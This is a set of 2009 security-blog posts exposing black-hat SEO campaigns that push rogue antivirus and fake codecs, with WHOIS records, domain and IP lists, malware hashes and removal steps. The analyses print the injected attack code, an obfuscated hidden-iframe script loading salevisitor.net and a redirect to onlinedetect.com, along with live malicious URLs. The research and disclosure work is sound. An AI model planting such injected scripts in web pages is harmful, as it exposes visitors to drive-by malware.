Black Hat SEO and Rogue Antivirus p.3

The silent threat: Black Hat SEO and Rogue Antivirus AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com READ THIS page if you need more information In addition to fake scanner domain, recent research also reveal that several sites are registered through "EVOPLUS LTD" with the information as follow: Registrant: Live Internet Marketing Limited ****@liveinternetmarketingltd.com attn: Private Registrations 5285 Decarie Boulevard #100 Montreal, QC H3W3C2 Canada +1-514-371-5650 Domain Name: LIVEINTERNETMARKETINGLTD.COM Registrar: EVOPLUS LTD Whois Server: whois.evonames.com Referral URL: http://www.evonames.com Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM Status: clientDeleteProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 27-mar-2009 Creation Date: 20-feb-2009 Expiration Date: 20-feb-2010 Registered Through: AdvancedHosters.com (http://www.AdvancedHosters.com) ****************************** Looking on google show absolutely no web presence apart from malware and pornography websites: For "liveinternetmarketingltd": Malware domain drop and pornography websites For "Live Internet Marketing Limited": Pornography websites For "liveinternetmarketingltd.com": Pornography websites and malware domain found by Malware Domain List. Looking on malwaredomainlist show 23 sites with the registrant information "liveinternetmarketingltd.com". Some domain have been added to the list below: antivirus-plus-new.com antivirusplussite.com bestinternetexamine.com bestnetcheckonline.com bestwebexamine.com downloadantivirusplus.com easynetcheckonline.com easywebchecklive.com easywebexamine.com easywebscanlive.com internethomecheck.com linkcanlive.com linkcanonline.com linkcanpro.com myantivirusplus.com myinternetexamine.com onlinescanweb.com rapldhsare.com safeyouthnet.com security-check-center.com securesoftinternet.com theantivirusplus.com websecurecheck.com websmartcheck.com websportscheck.com yourinternetexamine.com yournetascertain.com yournetcheckonline.com yournetcheckonline.com yourwebexamine.com yourwebscanlive.com yourwebscanpro.com ********************** SUSPENDED domain Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM antivirusplus.biz *** antivirusplus2009.net Symantec Result Registration Service Provided By: HIGH QUALITY HOST COMPANY *** avplus2009.com Symantec Result PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM *** internet-check.net PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM *** traffchecking.com Registration Service Provided By: ERDOMAIN.COM Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com ********************** ACTIVE domain *** av-plus-support.com PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM *** antivirusplussite.com has a fake error page which redirect to downloadantivirusplus.com/buy.php?id= downloadantivirusplus.com is also hosted on the same IP at ZlKon, also registered by "Live Internet Marketing Limited" and the fraudulent payment page is on the domain below: https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert= 209.8.25.204 - ns1.secure-plus-payments.com Registration Service Provided By: RESELLERCLUB Registrant: Globo inc John Sparck (sparck000@mail.com) South reg, 14 st, 3 Atoll ,3290867 BB Tel. +27.221994 "Globo inc" include: antivirus--plus.com, plus-antivirus.com (Already suspended) ********************** Looking on spamhaus also reveal newp-digital.com webspywareremover2009.com cure-soft.com [63.219.177.210] innovagest2000s.com secure-softwaretools.com [207.226.175.124] ********************** Host on 94.247.2.215 [hs.2-215.zlkon.lv] AS12553 AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd. Some screenshot
Analysis:
	File info: installer_1.exe             File size 666112 bytes     MD5 03a1e599d66c64cd11eb5f20d3645767                     Anubis: Report     ThreatExpert: Report     VirusTotal: Report             First received 03.27.2009 17:40:50 (CET)     Results 17/38 (44.74%)             Alias: Trojan.Win32.FakeXPA!IK a-squared       TR/Crypt.XPACK.Gen Antivir       SHeur2.YCE AVG       (Suspicious) - DNAScan CAT-QuickHeal       Trojan.DownLoad.33473 DrWeb       Trojan-Downloader.Win32.Delf.swq F-Secure       W32/FakeAV.NW!tr Fortinet       Trojan.Win32.FakeXPA Ikarus       Trojan-Downloader.Win32.Delf.swq Kaspersky       Generic Downloader.x McAfee       Generic Downloader.x McAfee       Trojan.Crypt.XPACK.Gen McAfee-GW-Edition       TrojanDownloader:Win32/Renos.BAO Microsoft       Suspicious File Panda       Troj/FakeAV-NW Sophos       Trojan.Fakeavalert.B Sunbelt       Trojan Horse Symantec   We can see on this post that the file downloaded two or three days after is updated with a new code.
Result when running:
	HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv] GET: myantivirusplus.com/install/AntivirusPlus.exe GET: myantivirusplus.com/install/InternetExplorer.dll GET: myantivirusplus.com/cfg/dmns.cfg   File info: AntivirusPlus.exe             File size 1435136 bytes     MD5 f0bc697765f31bd431e776387aca2c7f                     Anubis: Report     VirusTotal: First Report     VirusTotal: Second Report             First received 03.27.2009 14:17:34 (CET)     Results Result: 7/39 (17.95%)             Second time 03.30.2009 05:23:52 (CET)     Results Result: 12/39 (30.77%)     New info Prevx             Alias: Trojan.Win32.FakeXPA!IK       FakeAlert       Trojan.Win32.FakeXPA       Trojan:Win32/FakePlus     File info: InternetExplorer.dll             File size 442368 bytes     MD5 8e428574cb9e4f680d1e28fe3ca673e8                     VirusTotal: First Report     VirusTotal: Second Report             First received 03.24.2009 16:12:30 (CET)     Results Result: 20/39 (51.29%)             Second time 03.30.2009 05:23:52 (CET)     Results Result: 20/39 (51.29%)             Alias: Trojan.Win32.FraudPack.ify       Trojan.Win32.FakeAV.iy       Trojan.Win32.FakeXPA       Trojan:Win32/FakePlus
Screenshot:

Black Hat SEO and Rogue Antivirus p.2

The silent threat: Black Hat SEO and Rogue Antivirus The World Wide Web Consortium and Rogue AV Having your website hacked with IFRAME injected, trojans/backdoors? Having your pages infected with redirection to rogue antivirus/antispyware? Having your pages replaced with World Wide Web Consortium article and some obfuscated javascript code append to them? This page will show you some recent research about a malware campaign which has infected thousand of websites. In this campain all of these sites have been used to distribute fake antispyware called WinWebSec or FakeSpyGuard.(Sometimes called WinWebSecurity or SystemSecurity2009 with InternetAntivirusPro) Since July/August 2008 hundreds of thousands of pages on legitimate domains were exploited having web pages stuffed with keywords (porn, celebrities, popular snacks) uploaded to them as a means of attracting victims via search engine results. In some cases, the homepage of the compromised site is being modified, appending hidden links to the malicious web page. All info concluded that the attack was made via stolen FTP password, on all these domains. An alarming observation also reveal that the activity grows at an exponential rate with malware/exploit code even more sofisticated. You can find some IPs, network, domain used, example of hacked pages/websites and other malicious code injected into these domain on the links below or on other page on this blog. The silent threat: Black Hat SEO and Rogue AV - 1 The silent threat: Black Hat SEO and Rogue AV - 2 ********************* Screenshot below show tons of websites also used in this rogue av malware campaign but with some World Wide Web W3C pages uploaded with javascript code injected. Source of on of these site. In a browser. Deobfuscation results: window.location = encodeURI( "http://www.onlinedetect.com/in.cgi?7&tsk=aug-task13-r86-id67-t116-hst-16&type=l&seoref=" + encodeURIComponent(document.referrer) + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" + encodeURIComponent(document.URL) + "&default_keyword=XXX"); ----------------------- The source code also reveal thousand of hacked websites.The analysis of the javascript code redirect to onlinedetect.com or some domain used in this attack. You can find information on this page.

Black Hat SEO - PDF Malware campaign

The silent threat: Black Hat SEO - PDF Malware campaign Previously in March, Abode has released some security updates addressed to vulnerabilities and exploits using Adobe Reader. Some links can be found below McAfee Avert Labs: New Backdoor Attacks using PDF Documents Trend Micro Malware Blog: Portable Document Format or Portable Malware Format? SANS Internet Storm Center: Adobe/Acrobat 0-day in the wild? Adobe Security Bulletin: Buffer overflow issue Here is a complete example with sreenshots, data and analysis of a website used in the PDF malware campaign and hosting a malicious application called SUTRA. The application also known as "Traffic Management System" is explained by McAfee AvertLabs on this page: Inside the malicious traffic This cybercrime toolkit is actively used to manage traffic from compromised websites and redirects visitors to exploits code or other malicious URLs with fake codecs, rogue antispyware application, keyloggers, bankers trojan and many more. We have another example of a compromised website explained here. Screenshot of SUTRA can be found. *** Now let's take a look of another website used. The site is "salevisitor.net" 89.107.104.10 [Do not enter this site unless you know what you are doing] The payload is located here "salevisitor.net/in.cgi?6" [Unstable - file not found at this time] Just for your information, this is the structure of files/folders for SUTRA Traffic Manager drwxr-xr-x (755) admin drwxrwxrwx (777) data drwxr-xr-x (755) files drwxr-xr-x (755) html drwxr-xr-x (755) install drwxrwxrwx (777) memory drwxrwxrwx (777) stats drwxrwxrwx (777) admin/tmp drwxrwxrwx (777) admin/tmp.web     -rwxr-xr-x (755) getos.cgi -rwxr-xr-x (755) in.cgi -rw-r--r-- (644) index.html     admin:   -rwxr-xr-x (755) c.cgi -rwxr-xr-x (755) center.cgi -rwxr-xr-x (755) cron -rwxr-xr-x (755) cron.sh -rw-r--r-- (644) index.html -rw-r--r-- (644) panel.html drwxrwxrwx (777) tmp drwxrwxrwx (777) tmp.web -rwxr-xr-x (755) ub_fetcher     data:   -rw-r--r-- (644) admin_forces.html -rw-r--r-- (644) connection_type.html -rw-r--r-- (644) connection_type_new.html -rw-r--r-- (644) crontab_wizard.html -rw-r--r-- (644) edit_force_data.html -rw-r--r-- (644) edit_force.html -rw-r--r-- (644) edit.html -rw-r--r-- (644) edit_user.html -rw-r--r-- (644) force_data.html -rw-r--r-- (644) force.html -rw-r--r-- (644) forces.html -rw-r--r-- (644) forces_view.html -rw-r--r-- (644) general_stat.html -rw-r--r-- (644) GeoIP.dat -rw-r--r-- (644) geoip.html -rw-r--r-- (644) global_options.html -rw-r--r-- (644) global_vars.html -rw-r--r-- (644) import.html -rw-r--r-- (644) index.html -rw-r--r-- (644) key -rw-r--r-- (644) login.html -rw-r--r-- (644) lstats_export.html -rw-r--r-- (644) lstats.html -rw-r--r-- (644) main.html -rw-r--r-- (644) navigation.html -rw-r--r-- (644) page.html -rw-r--r-- (644) pages_navigation.html -rw-r--r-- (644) profile.html -rw-r--r-- (644) pstats_export.html -rw-r--r-- (644) pstats.html -rw-r--r-- (644) pstats_index.html -rw-r--r-- (644) register_done.html -rw-r--r-- (644) register.html -rw-r--r-- (644) search.html -rw-r--r-- (644) show_bottom.html -rw-r--r-- (644) show_data.html -rw-r--r-- (644) show_header.html -rw-r--r-- (644) stat_daily.html -rw-r--r-- (644) static_stat.html -rw-r--r-- (644) stat_main.html -rw-r--r-- (644) stats.html -rw-r--r-- (644) uptime_main.html -rw-r--r-- (644) users.html     files:   -rw-r--r-- (644) cgi.pm -rw-r--r-- (644) counter.gif -rwxr-xr-x (755) curl -rwxr-xr-x (755) default.cgi -rwxr-xr-x (755) gotourl.cgi     html:   -rw-r--r-- (644) image files and javascript (gif, js)     install:   drwxr-xr-x (755) freebsd4 // in.cgi drwxr-xr-x (755) freebsd5 // in.cgi drwxr-xr-x (755) freebsd6 // in.cgi drwxr-xr-x (755) linux // in.cgi     stats:   -rw-r--r-- (644) index.html The admin page has no password on this server so you can enter and see stats like: So now we know the IP, domain name, URLs used after redirection but from were is coming the traffic? Let's take a look of another folder "/memory/" This folder has files like 1.access.log, 2.access.log, 5.access.log, 25.access.log, 70.access.log etc... Some related topics on this blog refer to onlinedetect.com, 0day33hours.com for another malware campaign... Similars files can be found using google. here and here 2.access.log - The file contain the IP of visitors reaching infected websites, some are in Czech Republic, Israel, Russia, Turkey etc. The file also reveal the URL of some compromised websites were the malicious obfuscated javascript code has been inserted. Line 1: hxxp://www.met[BLOCKED]p.com.pl/meta........... Javascript Analysis Line 23: 77.250.xx.xx http%3A%2F%2Fwww%2Este[BLOCKED]tos%2Enl%2Find..... Javascript Analysis hxxp://www.gif[BLOCKED]za.pl/gify/baj... Javascript Analysis The analysing confirm that all these site has the same code added <script> if (!myia){ document.write(unescape(' %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63 %31%35%20%73%72%63%3d%27%68%74%74%70%3a%2f %2f%73%61%6c%65%76%69%73%69%74%6f%72%2e%6e %65%74%2f%69%6e%2e%63%67%69%3f%32&%27%2b% 4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74% 68%2e%72%61%6e%64%6f%6d%28%29%2a%32%31%35% 32%38%29%2b%27%37%30%65%33%66%35%31%63%35% 27%20%77%69%64%74%68%3d%35%32%20%68%65%69% 67%68%74%3d%34%31%34%20%73%74%79%6c%65%3d% 27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65% 27%3e%3c%2f%69%66%72%61%6d%65%3e')); } var myia = true; </script>   <iframe name=c15 src='http://salevisitor.net/in.cgi?2&'+ Math.round(Math.random()*21528)+'70e3f51c5' width=52 height=414 style='display: none'></iframe> Analysis report for hxxp://salevisitor.net/in.cgi?2 The script load a PDF located here quara-best.com/[BLOCKED]e30/pdf.php?id=5352 which then load this executable --> VirusTotal Report ****************** Some other related link: Honeynet Malware Detail Analysis of hxxp://eternal.alfamoon.com here MySpace Profile Attacked (screenshot below)

loyaldown-loyaltube Fake Codec and RogueAV

loyaldown09.com, loyaltube10.com Fake Codec and Rogue Antivirus loyaldown09.com, loyaltube10.com are site that distribute fake codec. We also have on this network sites which host rogue application like XP-Police-Antivirus and Win-PC-Defender Fake codec and fake scanner page screenshot loyaltube10.com [213.163.65.10] loyaldown09.com [213.163.65.9] hxxp://loyaltube10.com/scan/?id=.. hxxp://loyaltube10.com/tube/?id=...&title=adult+movie
Analysis:
	Redirectors used: hxxp://us-euro.biz/in.cgi?4&parameter=wifi [195.190.13.234] Analysis here   Site URLs: hxxp://loyaltube10.com/scan/?id=..       hxxp://loyaltube10.com/tube/?id=197&title=adult+movie       hxxp://loyaldown11.com/codec/.exe               hxxp://loyaldown11.com/codec/189.exe       hxxp://loyaldown11.com/codec/197.exe                     File info: codec.exe             File size 107011 bytes     MD5 704298be5c6bf8671517c79b827c9206                     ThreatExpert: Report     VirusTotal: Report     Anubis: Report (related: WinPC Defender)             First received 03.29.2009 01:17:30 (CET)     Results 6/39 (15.39%)             Alias: (Suspicious) - DNAScan CAT-QuickHeal       Suspicious File eSafe       Downloader-BON McAfee       Downloader-BON McAfee+Artemis       TrojanDropper:Win32/Insebro.A Microsoft       Malware-Cryptor.Win32.Zorq VBA32     Site URLs: hxxp://tubeloyal.com/scan/?id-..       hxxp://loyaldown11.com/codec/.exe                     File info: codec.exe             File size 107008 bytes     MD5 eb61517f7f0906dc0e60f0e0afd1bbf1                     ThreatExpert: Report     VirusTotal: Report     Anubis: Report (related: WinPC Defender)             First received 03.29.2009 01:41:38 (CET)     Results 6/39 (15.39%)             Alias: (Suspicious) - DNAScan CAT-QuickHeal       Suspicious File eSafe       Downloader-BON McAfee       Downloader-BON McAfee+Artemis       TrojanDropper:Win32/Insebro.A Microsoft       Malware-Cryptor.Win32.Zorq VBA32
Associated websites:
	[213.163.65.10] loyaltube.com loyaltube09.com loyaltube10.com rakompoporyadkunazaryadku.com setupdatdownload.com tubeloyal.com velzevuladmin.com win-pc-defender.com xp-police-09.com xp-police-2009.com xp-police-antivirus.com xp-police-av.com xp-police-engine.com [213.163.65.9] loyaldown09.com loyaldown11.com

av-best-info Anti-VirusN1 Rogue FakeXPA

av-best.info "VirusDoctor Online Scan" Anti-Virus1 Rogue FakeXPA av-best.info is a site that distribute AntivirusN1 a rogue antivirus application. AntiVirusN1 displays fake alerts in order to persuade users buying it. Registry keys/values must be deleted with antivirus / antispyware. Anti-Virus Number-1 can be removed by stopping the following processes - Kill processes: N1Two.exe, N1i.exe, 2.exe, 3.exe - Unregister DLLs (regsvr32 /u [dll_name]): QWProtect.dll - Delete files and folders: ► C:\Documents and Settings\All Users\Application Data\N1 ► %CommonAppData%\N1 ► %CommonPrograms%\Anti-Virus Number-1 This site appear to be normal at first sight. The payment system for this fraudulent and rogue program is made via Plimus (screenshot below) But the site has been reported as malicious by some users. Here is the fake scanner Site screenshot: Fake Security Warning Message: Adware.Win32.Look2me.ab Virus Critical Backdoor.Win32.Haxdoor.gu Virus High Trojan-Downloader.Win32.Small.dge Virus High Trojan Horse IRC/Backdoor.SdBot4.FRV Virus Medium W32.Benjamin.Worm Virus High W32.Mypics.Worm.36352 Virus Medium W32.Yaha.B@mm Virus Critical Trojan Horse Generic11.OQJ Virus High Magic DVD Ripper Virus High Recommend: Click "Start Protection" button to erase all threats Fake messages: Alert! Your PC is at risk of virus and spyware attack. Your system requires immediate check!i System Security Scanner will perform a quick and free scan of your PC for viruses and spyware programs. Associated website [174.142.113.206] [ip-174-142-113-206.static.privatedns.com] scanner.av-best.info download.av-best.info
Analysis:
	Site URLs: hxxp://scanner.av-best.info/scan.php?campaign=mmb_35930207 43&landid=4       hxxp://download.av-best.info/install.php?campaign=mmb_3593020743 &country=en&counter=0&campaign=mmb_3593020743&landid=4                     File info: AntiVirusInstaller.exe             File size 53278 bytes     MD5 f8d38325d9570ce3320f04e9d5278466                     ThreatExpert: Report     VirusTotal: Report     Anubis: Report             First received 03.28.2009 19:18:31 (CET)     Results 8/39 (20.52%)             Alias: TR/Crypt.CFI.Gen AntiVir       Win32.Packed.Krap.c.4 CAT-QuickHeal       Trojan.DownLoad.33135 DrWeb       Suspicious File eSafe       Trojan.Crypt.CFI.Gen McAfee-GW-Edition       Trojan:Win32/FakeXPA Microsoft       Suspicious File Panda       Cryp_FakeAV-11 TrendMicro
When running:
	HTTP Requests: [70.38.11.165]       http://70.38.11.165/admin/cgi-bin/get_domain.php?type=site       Content html: av-best.info               http://70.38.11.165/admin/cgi-bin/get_domain.php?type=download       Content html: download.av-best.info               [174.142.113.206]       hxxp://download.av-best.info/en/PE/2.exe       hxxp://download.av-best.info/en/PE/3.exe       hxxp://download.av-best.info/en/PE/en/PE/N1.CAB       hxxp://download.av-best.info/en/PE/en/PE/QWProtect.dll       hxxp://download.av-best.info/en/PE/en/PE/svchost.exe                     File info: 2.exe     File size 53248 Bytes     MD5 364f5d30dba520937f9f3b7979b389b1             VirusTotal: Report Alias: Trojan.Win32/FakeXPA       Received on 03.28.2009 22:08:07 (CET)       8/39 (20.52%)     ThreatExpert: Report     Prevx: Report                     File info: 3.exe     File size 257536 Bytes     MD5 b7d14c7ea7844057efcfd1a41ddc530f             VirusTotal: Report Alias: Trojan.Win32/FakeXPA       Received on 03.28.2009 22:08:18 (CET)       6/39 (15.39%)     ThreatExpert: Report                     File info: AntiVirusInstaller.exe     File size 53278 Bytes     MD5 f8d38325d9570ce3320f04e9d5278466             VirusTotal: Report Alias: Trojan.Win32/FakeXPA       Received on 03.28.2009 22:08:19 (CET)       8/38 (21.06%)     ThreatExpert: Report                     File info: N1.CAB     File size 504489 Bytes     MD5 c37aa0887be14b68381301e24ddaf8fb             VirusTotal: Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs       Received on 03.28.2009 22:08:51 (CET)       5/38 (13.16%)             File info: N1.exe     File size 527360 Bytes     MD5 2d6a49219639d63428b91eb7647ce491             VirusTotal: Report Alias: Trojan.Win32/FakeXPA / Trojan.Win32.Tibs       Received on 03.28.2009 22:09:09 (CET)       5/38 (13.16%)     ThreatExpert: Report                     File info: QWProtect.dll     File size 697856 Bytes     MD5 1b6c35cb941eaa9f6325a449cb6770b0             VirusTotal: Report Alias: Trojan.Win32/FakeXPA       Received on 03.28.2009 22:09:01 (CET)       4/38 (10.53%)     Prevx: Report     ThreatExpert: Report                     File info: svchost.exe     File size 80896 Bytes     MD5 c2613b801da4c8b6967d6da05c0443ed             VirusTotal: Report Alias: Trojan.Win32/FakeXPA       Received on 03.28.2009 22:08:47 (CET)       10/38 (26.32%)     Prevx: Report     ThreatExpert: Report
Result when running:
	Display fake BlueScreen "MALWARE.MONSTER.DX_NEW_0xA21518F0"
Anti-Virus Number-1 Rogue Application Screenshot:

Black Hat SEO and Rogue Antivirus

The silent threat: Black Hat SEO and Rogue Antivirus Messages telling you to install and update security software for your computer is a scary message. This tactic is known as scareware: http://en.wikipedia.org/wiki/Scareware Related article about "Free Security Scan" alerts from the Federal Trade Commission Court Halts Bogus Computer Scans "Free Security Scan" Could Cost Time and Money Since several months ago, massive attacks (obfuscated javascript inserted - IFRAME to inject backdoors/keyloggers), thousand of hacked websites used to distribute rogue antivirus have been detected by major antivirus vendors, cyber intelligence labs and other security companies. The exponential growth of rogue antivirus distribution through legitimate websites remain silent as the tactic used by the creators continued to become more sophisticated. Related article: Scammers making '$15m a month' on fake antivirus PandaLabs: 22,000 New Malware Samples Detected Every Day in 2008 PandaLabs Annual Report Rogue AV Detections in 2008 Sites on this blog refers to rogue antispyware which display misleading scan alerts and mostly installed on computer's victim without user consent throught infected websites (LEGITIMATE infected websites). UPDATE: The site now include IPs / botnet C&C / data logs exposed, links to LIVE urls exploits/vulnarabilities (flash - pdf) and domains with their relations, route, AS and malicious scripts found on compromised websites related to the same campaign. If you arrived to this page through a search engine about a domain in this blog, some removal information can be found on the links below. Sites analysis will be created and updated as new sites will be found. Twice or more a day if needed. If you arrived to this page and you are interested to find some information about these attacks, IPs domains and networkd used, here are some links used with details about this malware campaign Related article: Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Malware Defender 2009 Black Hat SEO and Rogue Antivirus: Fraudulent payment processors Antivirus360 Black Hat SEO and Rogue Antivirus: Fake Scanner RapidAntivirus templ. AntivirusPlus Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro Black Hat SEO and Rogue Antivirus: ZlKon Malware Drop Black Hat SEO and Rogue Antivirus: AntiSpyware Pro 2009 Black Hat SEO and Rogue Antivirus: Rogue Fake SpyGuard Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro Black Hat SEO and Rogue Antivirus: WinWebSecurity InternetAntivirusPro new variants Black Hat SEO and Rogue Antivirus: Part. 1) Black Hat SEO and Rogue Antivirus Part. 2) Black Hat SEO and Rogue Antivirus: The World Wide Web Consortium Mystery Part. 3) Black Hat SEO and Rogue Antivirus: AntivirusPlus ZlKon and liveinternetmarketingltd.com Part. 4) Black Hat SEO and Rogue Antivirus: Full or Rogues Part. 5) Black Hat SEO and Rogue Antivirus: Full of Hacks Part. 6) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.1 Part. 7) Black Hat SEO and Rogue Antivirus: Analyzing the tactic p.2 Part. 8) Black Hat SEO and Rogue Antivirus: Fake AV + Rootkit TDSS / Alureon / DNSChanger Black Hat SEO - Exploit, scripts, botnet C&C, hacks toolkit etc. Part. 1) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Thousand of domain attacked Part. 2) Black Hat SEO - Cyber Crime Toolkit Exposed: Welcome to LuckySploit:) ITS TOASTED Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Triple threats Part. 3) Black Hat SEO - Botnets, Scripts, Exploits, Hacks: Crimaware toolkits in the wild And here we have a list of fake scanner websites used in the attack which infect thousand of websites to distribute malware also known as WinWebSec (WinWebSecurity or SystemSecurity2009): Black Hat SEO and Rogue Antivirus Note: Other rogue av like AntivirusPlus through this list has been detected recently Many more like under the name of FakeSpyGuard, VirusRemover, WinAntiVirus2008, SpywareRemover2009, and some variant of "Trojan Hiloti" through this list Similar attacks with Google search strings : In 2008: We have an example with "Antivirus 2009" on the Trend Micro Malware Blog: A Million Search Strings to Get Infected A few days ago: On the CA website "onlinestabilityworld.com" is cited. The article is here: Rogue Security Software keeps on hitting Google searches Another list of fake codec websites in March on the Dancho Danchev's blog alsocited on this blog Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software And recent search also reveal the use of a powerfull javascript library jQuery - the screenshot below has been retreived from a legitimated infected website. Deobfuscated result is: The ip is 94.247.2.195 (ZlKon) Network used for hosting these malicious website are Starline Web Services in Estonia Zlkon in Latvia netdirekt e.K. in Germany Hetzner Online AG in Germany Ural-NET in Russia Eurohost LLC in Ukraine GloboTech via Olexij Khrenov in Ukraine Joint Multimedia Cable Network in Ukraine NTColo Networks in Ukraine Plitochnik Lux LTD in Ukraine Coloquest in US Netelligent Hosting Services Inc in US and some other in China, Moldavia. IPs, AS and network used can be found on this blog. ------------- New sites used on March 28: slot4scan.com, scan4fuse.com, list4scan.com, scan4home.com, gotimescan.com on March 29: mainscan6.com, scan4plus.info, scan4open.com on March 30: logscan6.com scan4way.com [redirection by gostepscan.com] 5scanav.com and scan5plus.com [redirection by gowithscan.com] new4scan.info,scan4live.info April: best4scan.info, best6scan.info,pro4scan.info,scanline6.com, scan6log.com, scan6main.com, scan6now.com,zpmuwbtqqwkw.net Analysis here ------------- Related article: The rash of rogue av (PDF) Related article about McColo Business: Similar network at UltraNet Ltd in Lavtia HostExploit’s Cyber Crime Series (PDF) The list on your right hand side are latest websites used in this malware campaign. (Updated daily) Some interesting links about malicious traffic at DATORU EXPRESS SERVISS - ZlKon in Latvia Pages related to the same attack. (Included some other problems, SPAM, botnet etc...) December  15, 2008: FakeAV and Codecs http://realsecurity.wordpress.com/2008/12/15/sources-of-badness-zlkon/ December  19, 2008: SPAM IP Detected http://forums.pligg.com/general-help/16374-spam-ip-94-247-2-29-kill.html http://www.projecthoneypot.org/ip_94.247.2.29 McAfee Avert Labs Blog Monday January 5, 2009 Explanation of the so-called “Traffic Management System” - Inside The Malicious Traffic Business http://www.avertlabs.com/research/blog/index.php/2009/01/05/inside-the-malicious-traffic-business/ We also have an complete example here. From the visitor to the legitimate infected website (with logs, screenshot, ips and analysis of the malicious website as well as the technic used. i.e: SUTRA traffic redirection, PDF exploit to inject backdoors etc..) Zeus Tracker https://zeustracker.abuse.ch/monitor.php?host=94.247.3.211 Wednesday January 7, 2009 Google Code Project Abused by Spammers http://www.avertlabs.com/research/blog/index.php/2009/01/07/google-code-project-abused-by-spammers/ January 19, 2009 Inaccurate whois details http://msmvps.com/blogs/spywaresucks/archive/2009/01/21/1663955.aspx January 2009 http://voices.washingtonpost.com/securityfix/2009/01/troubled_ukrainian_host_sideli.html Paragraph:Sunbelt's Jordan said those responsible for DNSChanger appear to have begun moving to a new base of operations over the past few weeks, to a network in Latvia, called "Zlkon.lv." http://ddanchev.blogspot.com/2009/02/diverse-portfolio-of-fake-security.html http://ddanchev.blogspot.com/2009/02/template-ization-of-malware-serving.html Paragraph from the ddanchev.blogspot.com: Interestingly, within the mirrored copy now tweaked and distributed for free using free image hosting services as infrastructure provider for the layout, there are also leftovers from the original campaign template that they mirrored - which ultimately leads us to DATORU EXPRESS SERVISS Ltd (AS12553 PCEXPRESS-AS) or zlkon.lv In the wake of UkrTeleGroup Ltd's demise -- don't pop the corks just yet since the revenues they've been generating for the past several years will make it much less painful -- a significant number of UkrTeleGroup customer, of course under domains, have been generating quite some malicious activity at zlkon.lv for a while. January 25, 2009 Rogue software - FakeAV http://pandalabs.pandasecurity.com/archive/New-Rogue_3A00_-Total-Defender.aspx February 5, 2009 Similar attack with the same added code between like <!-- ad --> <!-- /ad --> (Same code here) http://www.aladdin.com/AircBlog/post/2009/02/The-latest-undetected-malweb-by-RBN.aspx Other: http://www.aladdin.com/AircBlog/post/2009/02/Iraq's-embassy-in-Tehran-website-compromised-by-hackers.aspx Wednesday February 25, 2009 Google Trends Abused to Serve Malware http://www.avertlabs.com/research/blog/index.php/2009/02/25/google-trends-abused-to-serve-malware/